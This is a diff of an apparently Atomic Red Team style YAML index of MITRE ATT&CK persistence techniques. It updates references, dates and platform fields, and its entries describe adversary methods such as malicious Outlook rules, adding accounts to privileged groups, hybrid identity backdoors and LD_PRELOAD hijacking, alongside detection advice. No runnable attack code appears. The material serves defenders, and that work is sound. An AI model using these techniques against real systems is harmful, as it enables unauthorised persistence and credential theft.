-          get hacked by a Chrome extension. Retrieved November 22, 2017.'
-        url: https://kjaer.io/extension-malware/
+          get hacked by a Chrome extension. Retrieved September 12, 2024.'
+        url: https://web.archive.org/web/20240608001937/https://kjaer.io/extension-malware/
       - source_name: Catch All Chrome Extension
         description: Marinho, R. (n.d.). "Catch-All" Google Chrome Malicious Extension
           Steals All Posted Data. Retrieved November 16, 2017.
@@ -29291,71 +29657,139 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1176
     atomic_tests: []
   T1137.005:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T16:02:26.206Z'
+      name: Outlook Rules
+      description: |-
+        Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
+
+        Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
       x_mitre_contributors:
       - Microsoft Security
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+
+        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Application Log: Application Log Content'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
       created: '2019-11-07T20:00:25.560Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1137.005
         url: https://attack.mitre.org/techniques/T1137/005
-      - source_name: SilentBreak Outlook Rules
-        url: https://silentbreaksecurity.com/malicious-outlook-rules/
-        description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
-          February 4, 2019.
+        external_id: T1137.005
+      - source_name: Pfammatter - Hidden Inbox Rules
+        description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
+          Microsoft Exchange. Retrieved October 12, 2021.
+        url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
       - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
         description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
           Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
           4, 2019.
-      - source_name: Pfammatter - Hidden Inbox Rules
-        url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
-        description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
-          Microsoft Exchange. Retrieved October 12, 2021.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+      - source_name: SilentBreak Outlook Rules
+        description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
+          February 4, 2019.
+        url: https://silentbreaksecurity.com/malicious-outlook-rules/
       - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
         description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
           provides blue teams with the ability to detect Ruler usage against Exchange.
           Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
-      name: Outlook Rules
-      description: |-
-        Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
-
-        Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+        url: https://github.com/sensepost/notruler
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1098.007:
+    technique:
+      modified: '2024-10-14T14:32:08.926Z'
+      name: Additional Local or Domain Groups
+      description: "An adversary may add additional local or domain groups to an adversary-controlled
+        account to maintain persistent access to a system or domain.\n\nOn Windows,
+        accounts may use the `net localgroup` and `net group` commands to add existing
+        users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+        Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+        the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+        added to the local administrators group on Windows devices to maintain elevated
+        privileges. They may also be added to the Remote Desktop Users group, which
+        allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+        to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+        Linux, accounts may be added to the sudoers group, allowing them to persistently
+        leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+        for elevated privileges. \n\nIn Windows environments, machine accounts may
+        also be added to domain groups. This allows the local SYSTEM account to gain
+        privileges on the domain.(Citation: RootDSE AD Detection 2022)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
-      x_mitre_detection: |-
-        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
-
-        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.0'
       x_mitre_data_sources:
-      - 'Process: Process Creation'
-      - 'Application Log: Application Log Content'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      - 'User Account: User Account Modification'
+      type: attack-pattern
+      id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+      created: '2024-08-05T20:49:49.809Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1098/007
+        external_id: T1098.007
+      - source_name: Linux Usermod
+        description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+        url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+      - source_name: Microsoft Net Group
+        description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+          2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+      - source_name: Microsoft Net Localgroup
+        description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+          5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+      - source_name: Microsoft RDP Logons
+        description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+          Services. Retrieved August 5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+      - source_name: RootDSE AD Detection 2022
+        description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+          Active Directory environments. Retrieved August 5, 2024.
+        url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1546.011:
     technique:
@@ -29386,7 +29820,7 @@ persistence:
         description: Pierce, Sean. (2015, November). Defending Against Malicious Application
           Compatibility Shims. Retrieved June 22, 2017.
         source_name: Black Hat 2015 App Shim
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.094Z'
       name: 'Event Triggered Execution: Application Shimming'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by application shims. The Microsoft
@@ -29441,13 +29875,11 @@ persistence:
       - 'Process: Process Creation'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.011
     atomic_tests: []
   T1547.010:
     technique:
-      modified: '2024-04-12T02:49:39.980Z'
+      modified: '2024-09-12T15:26:17.886Z'
       name: 'Boot or Logon Autostart Execution: Port Monitors'
       description: "Adversaries may use port monitors to run an adversary supplied
         DLL during system boot for persistence or privilege escalation. A port monitor
@@ -29508,9 +29940,9 @@ persistence:
           slides&#93;. Retrieved November 12, 2014.
         url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
       - source_name: AddMonitor
-        description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
-          2014.
-        url: http://msdn.microsoft.com/en-us/library/dd183341
+        description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -29519,7 +29951,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.010
     atomic_tests: []
   T1037.002:
@@ -29572,7 +30003,7 @@ persistence:
         Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
         version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
         and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:42:05.094Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
       x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -29593,12 +30024,11 @@ persistence:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.002
     atomic_tests: []
   T1205:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T23:08:40.603Z'
       name: Traffic Signaling
       description: |-
         Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -29682,11 +30112,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T13:41:16.110Z'
       name: 'Boot or Logon Autostart Execution: Shortcut Modification'
       description: |-
         Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -29699,7 +30128,6 @@ persistence:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - David French, Elastic
       - Bobby, Filar, Elastic
@@ -29712,7 +30140,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.2'
@@ -29742,7 +30169,8 @@ persistence:
         url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1547.009
     atomic_tests: []
   T1525:
@@ -29774,7 +30202,7 @@ persistence:
         url: https://github.com/RhinoSecurityLabs/ccat
         description: Rhino Labs. (2019, September). Cloud Container Attack Tool (CCAT).
           Retrieved September 12, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T21:27:49.094Z'
       name: Implant Internal Image
       description: |-
         Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)
@@ -29796,8 +30224,6 @@ persistence:
       x_mitre_permissions_required:
       - User
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1547.005:
     technique:
@@ -29823,7 +30249,7 @@ persistence:
         description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
           Retrieved June 24, 2015.
         source_name: Microsoft Configure LSA
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T15:42:48.910Z'
       name: 'Boot or Logon Autostart Execution: Security Support Provider'
       description: |-
         Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
@@ -29849,36 +30275,34 @@ persistence:
       - 'Windows Registry: Windows Registry Key Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.005
     atomic_tests: []
   T1556.007:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Hybrid Identity
       description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
         processes that are tied to on-premises user identities in order to bypass
         typical authentication mechanisms, access credentials, and enable persistent
         access to accounts.  \n\nMany organizations maintain hybrid user and device
         identities that are shared between on-premises and cloud-based environments.
-        These can be maintained in a number of ways. For example, Azure AD includes
-        three options for synchronizing identities between Active Directory and Azure
-        AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+        These can be maintained in a number of ways. For example, Microsoft Entra
+        ID includes three options for synchronizing identities between Active Directory
+        and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
         (PHS), in which a privileged on-premises account synchronizes user password
-        hashes between Active Directory and Azure AD, allowing authentication to Azure
-        AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
-        in which Azure AD authentication attempts are forwarded to an on-premises
+        hashes between Active Directory and Entra ID, allowing authentication to Entra
+        ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+        in which Entra ID authentication attempts are forwarded to an on-premises
         PTA agent, which validates the credentials against Active Directory \n* Active
         Directory Federation Services (AD FS), in which a trust relationship is established
-        between Active Directory and Azure AD \n\nAD FS can also be used with other
+        between Active Directory and Entra ID \n\nAD FS can also be used with other
         SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
         process to AD FS and receive a token containing the hybrid users’ identity
         and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
         an adversary may be able to establish persistent privileged access to cloud
         resources. For example, adversaries who compromise an on-premises server running
         a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
-        process that authorizes all attempts to authenticate to Azure AD, as well
+        process that authorizes all attempts to authenticate to Entra ID, as well
         as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
         AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
         may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
@@ -29886,9 +30310,9 @@ persistence:
         any set of claims, thereby bypassing multi-factor authentication and defined
         AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
         to modify the hybrid identity authentication process from the cloud. For example,
-        adversaries who compromise a Global Administrator account in an Azure AD tenant
+        adversaries who compromise a Global Administrator account in an Entra ID tenant
         may be able to register a new PTA agent via the web console, similarly allowing
-        them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+        them to harvest credentials and log into the Entra ID environment as any user.(Citation:
         Mandiant Azure AD Backdoors)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -29897,21 +30321,22 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
       - SaaS
-      - Google Workspace
-      - Office 365
       - IaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Praetorian
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -29951,13 +30376,10 @@ persistence:
         url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.004:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:48.453Z'
       name: 'Create or Modify System Process: Launch Daemon'
       description: |-
         Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in <code>/System/Library/LaunchDaemons/</code> and <code>/Library/LaunchDaemons/</code>. Required Launch Daemons parameters include a <code>Label</code> to identify the task, <code>Program</code> to provide a path to the executable, and <code>RunAtLoad</code> to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
@@ -30034,12 +30456,11 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1543.004
     atomic_tests: []
   T1574.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:25:57.059Z'
       name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -30058,6 +30479,7 @@ persistence:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Stefan Kanthak
+      x_mitre_deprecated: false
       x_mitre_detection: |
         Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
 
@@ -30065,7 +30487,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -30085,29 +30506,31 @@ persistence:
       id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
       created: '2020-03-13T17:48:58.999Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1574/008
         external_id: T1574.008
+      - source_name: Microsoft Environment Property
+        description: Microsoft. (2011, October 24). Environment Property. Retrieved
+          July 27, 2016.
+        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+      - source_name: Microsoft WinExec
+        description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
       - source_name: Windows NT Command Shell
         description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
           December 5, 2014.
         url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
-      - source_name: Microsoft WinExec
-        description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms687393
-      - source_name: Microsoft Environment Property
-        description: Microsoft. (2011, October 24). Environment Property. Retrieved
-          July 27, 2016.
-        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.008
     atomic_tests: []
   T1505.003:
@@ -30184,12 +30607,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1505.003
     atomic_tests: []
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -30204,6 +30626,7 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -30212,18 +30635,18 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -30255,9 +30678,6 @@ persistence:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests: []
   T1547.003:
@@ -30329,7 +30749,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.003
     atomic_tests: []
   T1546.005:
@@ -30356,7 +30775,7 @@ persistence:
         url: https://bash.cyberciti.biz/guide/Trap_statement
         description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
           2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T16:43:02.273Z'
       name: 'Event Triggered Execution: Trap'
       description: |-
         Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like <code>ctrl+c</code> and <code>ctrl+d</code>.
@@ -30382,13 +30801,11 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.005
     atomic_tests: []
   T1574.006:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.146Z'
       name: 'Hijack Execution Flow: LD_PRELOAD'
       description: "Adversaries may execute their own malicious payloads by hijacking
         environment variables the dynamic linker uses to load shared libraries. During
@@ -30509,7 +30926,6 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1574.006
     atomic_tests: []
   T1136.001:
@@ -30581,7 +30997,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1136.001
     atomic_tests: []
   T1547.004:
@@ -30651,7 +31066,6 @@ persistence:
